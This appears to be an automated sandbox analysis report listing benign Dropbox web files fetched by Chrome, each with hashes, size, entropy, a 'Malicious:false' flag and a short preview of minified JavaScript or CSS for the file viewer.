                                                    SHA-512:F6C5A1A1BEDBB469B0885302D793F93FD5DF50E2F67C169117ECDFE16687566F566F40F4AC01D3C7340915BEDA1EC410595B4A4587C270512C93B2657734D638
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_action_plugins_conversion_action_conditions"],(function(e,S,r){"use strict";const i=[S.SDKPreviewSurface.BROWSE,S.SDKPreviewSurface.FILE_LOCKING,S.SDKPreviewSurface.HOME,S.SDKPreviewSurface.INBAND_SHARE,S.SDKPreviewSurface.RECENTS,S.SDKPreviewSurface.SEARCH,S.SDKPreviewSurface.SHARED_CONTENT_LINK,S.SDKPreviewSurface.SHARED_LINK,S.SDKPreviewSurface.SHARED_LINK_EMBED,S.SDKPreviewSurface.STANDALONE_PREVIEW,S.SDKPreviewSurface.STARRED,S.SDKPreviewSurface.POLLUX_DESKTOP_PREVIEW,S.SDKPreviewSurface.LOW_DISTRACTION_VIEW,S.SDKPreviewSurface.POLLUX_DESKTOP_SEARCH_PREVIEW],E=[S.PreviewType.Video,S.PreviewType.Audio],P={filterValidFile:e=>S.isEncryptedFile(e)?void 0:e,filterValidUser:e=>({user:e}),shouldShowForPreviewSurface:r.filterSurfaceIn(i),shouldShowForPreviewType:e=>r.filterPreviewTypeIn(E)(e)};e.SUPPORTED_TRANSCRIPTION_PREVIEW_TYPES=E,e.SUPPORTED_VIDEO_TRANSCRIPTION_PREVIEW_SURFACES=i,e.transcriptActionConditions=P}));.//# so
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:C source, ASCII text, with very long lines (1544)
                                                    Category:dropped
                                                    Size (bytes):1625
                                                    Entropy (8bit):5.161020411243324
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A195BA1130AAFE630AC8E3B68C0BA4CF
                                                    SHA1:96FD5F1E9921E512171782D10063E80101D0C22B
                                                    SHA-256:A4B898204A65BDD44446D7829035E82FECD4C2F9F4B5636D5235C2022E660ACA
                                                    SHA-512:F66AA73403AF25439AB42295087A1F56132CD382313AB8149761587BD0DE9236DABE738705E48DCB3ED2DAD23F28DF75156FE79DD0EDA62397E5935A13FA01E9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_integrations_hellosign_deep_integration_constants","./c_ts_utils"],(function(e,t,n){"use strict";function o(){if(!window.ensemble)return void 0!==n.getYapsProject()&&void 0!==n.getYapsDeployment()?`${n.getYapsProject()}:${n.getYapsDeployment()}`:void 0;const e=window.ensemble.getPageletInfoForExceptionReporting().filter((e=>void 0!==e.yaps_deployment&&void 0!==e.yaps_project));return 0!==e.length?e.sort(((e,t)=>e.pagelet_name<t.pagelet_name?-1:1)).map((e=>`${e.yaps_project}:${e.yaps_deployment}`)).join(";"):void 0}const s=function(e){};class r{constructor(e=(()=>{})){this._mapper=e}static getInstance(){return r._instance||(r._instance=new r),r._instance}static reset(){r._instance=new r}setMapper(e){this._mapper=e}resolve(){let e="";try{e=this._mapper(window.location)}catch(e){}return e||""}}r._instance=null;const a=r.getInstance();e.getAttributionHeader=o,e.resolveRouteName=()=>a.resolve(),e.sendXhr=function(e,n,r=s){t.assertDropboxDomain(e),function(e){const n=t
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4518)
                                                    Category:dropped
                                                    Size (bytes):4574
                                                    Entropy (8bit):5.4932214288036425
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B0BD2484D17DC95AAA8147BF7EFB7A9F
                                                    SHA1:24AB11A081D695E0BCD2D6CFDC730A86B879C5A5
                                                    SHA-256:3AA7BADC0C24F38F4B36A0749C2A91234C30C3185E5EFA5FEC7142C18E3D52A6
                                                    SHA-512:4605FE187F0932526B47105D5394059F8B696D17A27EFB5623F0C98E3D17E59DB93FEE89F51425D509D9A08051F5D5AE28C7BE39D10CE7A086DAE9A26932BD17
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./e_core_exception","./c_ts_utils"],(function(e,_,t,a){"use strict";function o(e){return{class:"sharing_receiver",action:"select",object:"mobile_hard_stop_action",properties:e}}const r=Symbol("ON_HARDSTOP_MOUNTED"),i=Symbol("ON_HARDSTOP_GET_APP"),E=Symbol("ON_HARDSTOP_CLICK_VIEW_FILE"),l=Symbol("ON_HARDSTOP_CLICK_VIEW_FOLDER"),n=Symbol("ON_MOUNT_SHARED_FOLDER_START"),R=Symbol("ON_MOUNT_SHARED_FOLDER_API_SUCCESS"),g=Symbol("ON_MOUNT_SHARED_FOLDER_API_FAILURE_ALREADY_MOUNTED_ERROR"),S=Symbol("ON_MOUNT_SHARED_FOLDER_API_ACCESS_ERROR"),s=Symbol("ON_MOUNT_SHARED_FOLDER_API_FAILURE_INSIDE_SHARED_FOLDER_ERROR"),O=Symbol("ON_MOUNT_SHARED_FOLDER_API_NO_PERMISSION_ERROR"),y=Symbol("ON_MOUNT_SHARED_FOLDER_API_FAILURE_NOT_MOUNTABLE_ERROR"),D=Symbol("ON_MOUNT_SHARED_FOLDER_API_FAILURE_INSUFFICIENT_QUOTA_ERROR"),A=Symbol("ON_MOUNT_SHARED_FOLDER_API_FAILURE_TOTAL_MOUNTS_EXCEEDED_ERROR"),L=Symbol("ON_MOUNT_SHARED_FOLDER_API_FAILURE_TREE_SIZE_
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (1418)
                                                    Category:downloaded
                                                    Size (bytes):1486
                                                    Entropy (8bit):5.070745098985945
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8172B1B7867BD1C73E5FD73BBEFFD085
                                                    SHA1:E1B1CD41B05D7106893ABD5698053413B4E09055
                                                    SHA-256:BBB90E5C59F9D61DCA40DDC81805E84F0443B1B1AF44D497BA04A59DA09529FB
                                                    SHA-512:3C674048804F2A7FC870573BA64898E3A1B2BBFAA294DCDFAB122B648930EDB0E07175CA90129D0D8DE8E1DB900EFF521F792C4D297F5ADEE74FA36DDB44F33D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_actions_strings-vflgXKxt4.js
                                                    Preview:define(["exports","./c_core_i18n"],(function(e,a){"use strict";const s=a.defineMessage({id:"z7/sbf",defaultMessage:"{count, plural, one{Deleting {count} item...} other{Deleting {count} items...}}"}),d=a.defineMessage({id:"da2lvf",defaultMessage:"Delete"}),r=a.defineMessage({id:"z4npcw",defaultMessage:"{count, plural, one{Deleting {count} folder.} other{Deleting {count} folders.}}"}),n=a.defineMessage({id:"hCpZct",defaultMessage:"Delete undone."}),t=a.defineMessage({id:"KYHY0Z",defaultMessage:"Name was invalid."}),l=a.defineMessage({id:"8j6sBp",defaultMessage:"Renaming"}),i=a.defineMessage({id:"NqCfwG",defaultMessage:"Renamed 1 item."}),o=a.defineMessage({id:"U3y3i9",defaultMessage:"Creating folder..."}),g=a.defineMessage({id:"HOb8Zp",defaultMessage:'The following characters are not allowed: angle brackets \\ / : ? * " |'}),f=a.defineMessage({id:"qZTFM0",defaultMessage:"Can.t create folder."}),c=a.defineMessage({id:"VDjS9+",defaultMessage:"Create folder"}),M=a.defineMessage({id:"1
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (707)
                                                    Category:downloaded
                                                    Size (bytes):780
                                                    Entropy (8bit):5.1103846409546785
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8AA0516EC9DAB9900C00F7B67FDE6250
                                                    SHA1:F151AFD713A3B83FEF0EB877AF9BDD8BD0BF9415
                                                    SHA-256:1CEF7C76045E8E2B97E27F5F417FAD5A41EA81145175E86903271E3336692812
                                                    SHA-512:6626922F5A5B47DB7A8E079151E13877265209F9A5E44839BCC2B6B4A7BEDF13E47DE8EB78E07DA84FC8B4CCCBCD307301D57A28E038C9C7FC8ED5F55BD55EDA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_icon_templates_actionable_index-vfliqBRbs.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_spectrum_svg_icon_bundle"],(function(e,t,c,n){"use strict";function a(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var r=a(t);const o=({className:e,icon:t,name:a,disabled:o=!1,role:l="img",...i})=>{const s=c.cx(n.getClassNamesForName("actionable",a),{"mc-icon-template-actionable-disabled":o},e);return r.cloneElement(t,{className:s,role:l,...i})};o.displayName="IconTemplateActionable",e.Component=o}));.//# sourceMappingURL=c_icon_templates_actionable_index.js-vflrYgTDB.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1701)
                                                    Category:downloaded
                                                    Size (bytes):1784
                                                    Entropy (8bit):5.362795258841976
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7F3F20FC509638BE3959B83CCCC80083
                                                    SHA1:494E7B0ED3385EE0F0824EE05B12C4E6C8091010
                                                    SHA-256:843DD9D4DEA3A04F8E39F60BA334AD0CE1E3B3F0DED7E22DFDE9476D06EDB5A4
                                                    SHA-512:7D90867207B63CF21040B6C6BECF8490CF9B01F01A446EC1FF85515FB505F9982A35520B18D4995B520549CD1A20F210133FF9C34BF60E51A9D682B931090C87
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_expand-left-vflfz8g_F.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.AddCommentLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M21.5 16.5H18V13h-1.5v3.5H13V18h3.5v3.5H18V18h3.5v-1.5Zm-9.5-9c2.858 0 4.325 1.31 4.485 4h1.502v-.04C17.796 7.939 15.67 6 12 6c-3.869 0-6 2.131-6 6 0 3.67 1.939 5.796 5.46 5.986h.04v-1.502c-2.69-.159-4-1.626-4-4.484 0-3.028 1.472-4.5 4.5-4.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.EditLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M17.988 7.139c0 .597-.236 1.169-.657 1.591l-7.114 7.109-4.25.691.692-4.25 7.111-7.11a2.252 2.252 0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (37231)
                                                    Category:dropped
                                                    Size (bytes):37346
                                                    Entropy (8bit):5.142442707735396
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1B51E0DDE3E3F269D0FF22FD74E14C69
                                                    SHA1:B76856487A72D2FBBF4C78B7E9608A816DCFC2F1
                                                    SHA-256:3AE4E63836B060C887ED630D6064AD813630591B31884AA927FB28CFD5031672
                                                    SHA-512:1CABA02B492965BB25F0176A18CDD245495E2AC06FBE0A2415CCC7C27BAE67C712A26D067599851573D69652876069B736A4EC3F82192E6F38653F6780F13C42
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_ui_modal_dig","./c_core_i18n","./c_core_notify","./c_account_email_verify_reasons","./e_core_exception","./c_api_v2_routes_folders_info_provider","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./e_data_modules_stormcrow","./c_src_sink_index","./c_lodash","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","react-dom","metaserver/static/js/langpack"],(function(e,t,s,i,a,r,o,n,l,m,d,u,c,f,h,g,p,_,v,E){"use strict";function y(e){return e&&e.__esModule?e:{default:e}}var M=y(t);class w extends M.default.Component{constructor(e){super(e),this.state={sent:!1,submitting:!1}}resetResponseSuccess(e){"OK"===e.status?(r.Notify.success(a.intl.formatMessage({id:"SSwbgo",defaultMessage:"Sent an email to {email}"},{email:this.props.email})),this.setState({sent:!0,submitting:this.state.submitting}))
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (13130)
                                                    Category:downloaded
                                                    Size (bytes):13191
                                                    Entropy (8bit):5.235270178098886
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:351C304C612DFA0CC58A80BA747606FF
                                                    SHA1:2A73AEE3B4FA12ABDBD817DD7EAE9F9EA12CFC67
                                                    SHA-256:6B85C87722E63BBF3D7394B7EF797DE908E03C89F2F8EAC7404499A794AEA822
                                                    SHA-512:5C565634B5C334188B6633C40B7D90D600C1BA5B65F0F05962A3742F13B597D2D3917EDA22532219175EB08890E801D3AB6FEE623451FE05A82721BE1F9FE832
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_icon_shortcuts_icon-vflNRwwTG.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_icon_folder_icon","./c_ui_title_bubble","./c_core_i18n","./c_ui_overlay","./e_edison"],(function(t,e,s,a,r,i,l,c){"use strict";function o(t){return t&&t.__esModule?t:{default:t}}var m,g=o(e);class n extends g.default.PureComponent{render(){const t=function(t){const e={is_locked:!1,is_lockholder:!1,lockholder_name:""};return t?(t.lock_info?(e.is_locked=!0,e.lockholder_name=t.lock_info.lockholder_name,e.is_lockholder=t.lock_info.is_lockholder):("is_locked"in t&&(e.is_locked=t.is_locked||!1),"is_lockholder"in t&&(e.is_lockholder=t.is_lockholder||!1),"lockholder_name"in t&&(e.lockholder_name=t.lockholder_name||"")),e):e}(this.props.file),{is_locked:e,is_lockholder:s}=t;if(!e)return this.props.children;const a=g.default.createElement("div",null,function(t){const{is_lockholder:e,lockholder_name:s}=t;return e?i.intl.formatMessage({id:"TsSIGV",defaultMessage:"Locked by You"}):i.intl.formatMessage({id:"x3AX+F",defaultMessag
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2052)
                                                    Category:dropped
                                                    Size (bytes):2135
                                                    Entropy (8bit):5.3657228695070085
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CE54ECA69CD7A849147BAE163C689503
                                                    SHA1:3CAA45F00AF321168755869A8B9666A2314449D6
                                                    SHA-256:321A86067F11F678CA32C4712BEA11F92FB959923537CFD5EF8AAD4CA8186FD1
                                                    SHA-512:BA37E5304D4F97B1C47BCE59FDECC58348607A22CB8A8CAB57032D4ABC27EE7664E89ED7120E473DB801984F9C686799CA8C39125986E99351F6F884DA358F5E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.BackupLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M7 4.5V17h12.5v-4.668l1.41 1.41 1.06-1.06-3.183-3.184-3.183 3.184 1.06 1.06L18 12.407V15.5H8.5V6H18v2.004h1.5V4.5H7Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),r.createElement("path",{d:"M5.5 7.5H4V20h12.5v-1.5h-11v-11Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.MobileLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M7 4v16h10.5V4H7Zm9 14.5H8.5v-13H16v13Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),r.createElement("path",{d:"M12.25 17a1.161 1.161 0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1029)
                                                    Category:downloaded
                                                    Size (bytes):1103
                                                    Entropy (8bit):4.9741544684559305
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A672F915D17244670EE90786A3B16919
                                                    SHA1:E2E74A6E6437BBCBEDE044ECD395302B7E9DA9E8
                                                    SHA-256:7AC5F4C8DC0B0DE663121E3D69511D9F37FF51729CCEE22F3D9262706F0971A7
                                                    SHA-512:4963D37AFCA1CF1D7315856D68DD153134FBEDA2DB5371B42025A7237B53BF41DA1D7EC5EF11C0FDFE6115F0335B888AF56304DF5F3D66087211E7F9B77BAD20
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_common_share_helpers-vflpnL5Fd.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,_,n,i,o,s,r,c,a,d,l,f,u,h,m,p,g,v){"use strict";function w(e,t,n){const i={filename:_.getFilename(e),isFolder:!1,nsId:e.ns_id,origin:n,sjid:e.sjid,url:t||void 0,fqPath:""};return _.isBrowseFile(e)&&(i.fqPath=e.fq_path),null!=e.file_id&&(i.fileId=e.file_id),i}t.getDataForContentInfo=w,t.share=function(t,_,n,i){new Promise((function(t,_){e(["./c_sharing_share_modal_util"],t,_)})).then((function(e){return e.share_modal_util_esnext})).then((e=>{const o=w(t,n,i.origin);e.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1751)
                                                    Category:downloaded
                                                    Size (bytes):1803
                                                    Entropy (8bit):5.26359379996957
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4856A9C4A37D906D12343F1F8933FFEC
                                                    SHA1:40850ED3858910C3F4224A014679090843CC3DDC
                                                    SHA-256:3064D81A311B9D1815A25BA79C592C90C0798607171ACFC1DA030FB3E9BFD78F
                                                    SHA-512:523C6B6DE06F8E9DE9758B2B02E7DCA489A2B8E1A47F3E19C7605B478F5DD89CEB840E1B06482722D62D91F7B98ACE4241F28A111BE3F58DDE7A07ABCE68A427
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_validators-vflSFapxK.js
                                                    Preview:define(["exports","./c_core_i18n"],(function(e,a){"use strict";class s{}const t=/^[\x00-\x7f]*$/;class i extends s{validate(e){if(!(e=null==e?void 0:e.trim())||e.length>253)throw new Error(a.intl.formatMessage({id:"KZNdp7",defaultMessage:"The domain {input} is invalid"},{input:e}));if(t.test(e)&&!i.domain_re.test(e))throw new Error(a.intl.formatMessage({id:"KZNdp7",defaultMessage:"The domain {input} is invalid"},{input:e}))}}i.domain_re=new RegExp("^([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\\.)+[A-Za-z]{2,}$","i");class n extends s{validate(e){if(!(e=null==e?void 0:e.trim()))throw new Error(n.messages.empty);const s=e.split("@");if(2!==s.length)throw new Error(n.messages.noAt);const[t,i]=s;if(!n.username_re.test(t))throw new Error("string"==typeof n.messages.badUsername?n.messages.badUsername:a.intl.formatMessage(n.messages.badUsername,{username:t}));try{n.urlValidator.validate(i)}catch(e){throw new Error("string"==typeof n.messages.badDomain?n.messages.badDomain:a.intl.formatMessag
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2
                                                    Entropy (8bit):1.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:99914B932BD37A50B983C5E7C90AE93B
                                                    SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                    SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                    SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (13054)
                                                    Category:dropped
                                                    Size (bytes):13110
                                                    Entropy (8bit):5.388896334328887
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6818F7A1413EDB8CFE0414BE727A0DFB
                                                    SHA1:62C540E7EFA8E7D0548FC2E37A270AB8210C9BC3
                                                    SHA-256:0B988A95E08B38D40F720D5FB7707A2D80292D51A389924E6276DAA822A24A94
                                                    SHA-512:44F4B8D36B5B1432D5B5C5FAE5DACF9437139C11D7B3BF1390E4CEE82A8EE73289A7296AFEDF7B4D57F56B8041D93E6B2D82195A8CCBEE0705F91129AD3C7DE6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_lodash"],(function(e,n){"use strict";let t=new Set;if(globalThis.ensemble){const e=globalThis;e.REGISTERED_EXCEPTION_TAGS||(e.REGISTERED_EXCEPTION_TAGS=new Set),t=e.REGISTERED_EXCEPTION_TAGS}var r,i={exports:{}};r=i,function(e,n){if(e){var t={},i=e.TraceKit,o=[].slice,c="?";t.noConflict=function(){return e.TraceKit=i,t},t.wrap=function(e){return function(){try{return e.apply(this,arguments)}catch(e){throw t.report(e),e}}},t.report=function(){var n,r,i=[],c=null,s=null,u=null;function a(e,n){var r=null;if(!n||t.collectWindowErrors){for(var c in i)if(l(i,c))try{i[c].apply(null,[e].concat(o.call(arguments,2)))}catch(e){r=e}if(r)throw r}}function f(e,r,i,o,c){if(u)t.computeStackTrace.augmentStackTraceWithInitialElement(u,r,i,e),p();else if(c)a(t.computeStackTrace(c),!0);else{var l={url:r,line:i,column:o};l.func=t.computeStackTrace.guessFunctionName(l.url,l.line),l.context=t.computeStackTrace.gatherContext(l.url,l.line),a({mode:"onerror",message:e,stack:[l]},!0)}retur
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2007)
                                                    Category:dropped
                                                    Size (bytes):2083
                                                    Entropy (8bit):5.250269096949091
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:22F80E0F2D84228D920B725052F9B1E7
                                                    SHA1:16636FD1635E86E361958966EA1E4D04766CE0DA
                                                    SHA-256:4DEE85D770132BF4550A342B3D1FAF77BF54B7587EC7DB0B628BBA21679ECF5F
                                                    SHA-512:F9F559E91A7DA4DA266C1A9B4AFF3FA0FEC4710C124DE361B90A681D294789A1D3BBDC934C94D450B923CEFB572809B64BA335427351E07C26E4616C7E09A744
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.FillScreenLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m12.75 14.239 1.07-1.03 1.04 1.082L12 17.04l-2.86-2.75 1.04-1.082 1.07 1.03V9.76l-1.07 1.03-1.04-1.082L12 6.96l2.86 2.75-1.04 1.082-1.07-1.03v4.478Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M6 5.5A1.5 1.5 0 0 1 7.5 4h9A1.5 1.5 0 0 1 18 5.5v13a1.5 1.5 0 0 1-1.5 1.5h-9A1.5 1.5 0 0 1 6 18.5v-13Zm1.5 0h9v13h-9v-13Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.FullWidthLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.creat
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):4418
                                                    Entropy (8bit):4.550570902126072
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D6C32610BC01D28D09392E8CAE4869E6
                                                    SHA1:1A248754B2853D6FFA0381BBA3C4CA65C1AF19C5
                                                    SHA-256:107F84EDAF1294B3B3681D48FAFE9DE85165493D55EA9C361FA08ECBD7994148
                                                    SHA-512:1F62F8FC1A3C6165019B7D736E04154D55C5135F83AE3A67E07FE55C00A2714297061C93A79DD5A9B710C6AC00F5286EC4E9992836802C223F5A4AECD518112D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/legacy-token-migration-vfl1sMmEL.css
                                                    Preview:/* .In-Theme-Provider is the generic class we use to say we're inside of DIG's theme provider..we use it here as a way to ensure that the specificity of this selector can beat `0 1 0` assuming.it is loaded **after** the other dig tokens..*/..In-Theme-Provider {. --color__standard__background: var(--dig-color__background__base);. --color__faint__background: var(--dig-color__background__subtle);. --color__elevated__background: var(--dig-color__background__raised);. --color__standard__text: var(--dig-color__text__base);. --color__faint__text: var(--dig-color__text__subtle);. --color__standard__border: var(--dig-color__border__base);. --color__faint__border: var(--dig-color__border__subtle);. --color__disabled__text: var(--dig-color__disabled__base);. --color__disabled__border: var(--dig-color__disabled__base);. --color__disabled__background: var(--dig-color__disabled__base);. --color__core__accent: var(--dig-color__primary__base);. --color__attention__text: var(--dig-color__pr
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (13906)
                                                    Category:downloaded
                                                    Size (bytes):13974
                                                    Entropy (8bit):5.315957500505056
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F4130693072AFFFD0DAF31EC8F960595
                                                    SHA1:C496D9F89A4D885021F677976E691E67F93EE95E
                                                    SHA-256:115716D6DCE8F71597494C1BDAA9CA6DA2934273E7E72110A82E23FC80ABE699
                                                    SHA-512:7CD35F4BC3A24F310E2D37B76F76990150C425AB6C6CDDCD717111480A5570E6CB5C9ECC2D5D8666CE728239C7029B0E4BB4212E947F55EAD89C6629C006EB66
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_logging_timing-vfl9BMGkw.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_data_ui","./c_core_utils_is_text_preview_on","./c_react-redux_hooks_useDispatch","./c_web-vitals","./e_edison","./c_core_logging_actions","./c_file_viewer_hooks_lifecycle_logging","./c_lodash","./c_file_viewer_hooks_usePrevious"],(function(e,i,t,n,o,r,s,l,a,c,g,v){"use strict";function d(e){if(e&&e.__esModule)return e;var i=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(i,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),i.default=e,Object.freeze(i)}var u=d(i);function _(e){return Object.keys(e).reduce(((i,t)=>{const n=e[t];return"string"==typeof n||"number"==typeof n?i[t]=String(n):"boolean"==typeof n?i[t]=String(+n):"object"==typeof n&&n&&(i[t]=JSON.stringify(n)),i}),{})}function w(e,i){return{...e,file_extension:t.getWhitelistedFileExtension(e.file_extension||""),extra:_({...e.extra,...i})}}const p
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1357)
                                                    Category:dropped
                                                    Size (bytes):1414
                                                    Entropy (8bit):5.007390140874046
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:121E7524D5E1EF60BA03279CAC7946A6
                                                    SHA1:AF854348B3121EC2BF3A137999A28B84E53D2266
                                                    SHA-256:4A87938F85308D22DBD9797A5682CC2AA72FACA481E2DD4B4F35754F4CEF2943
                                                    SHA-512:9AF96FC2C7E3A4762D751C4460C4A9EBD60CA93887C32B9F0CBE9C85C3F3809FFCCCA0D5DEA97BC782EE3DD707F72D8D77B86419E9E642CFA323C74B2B83C808
                                                    Malicious:false
                                                    Reputation:unknown
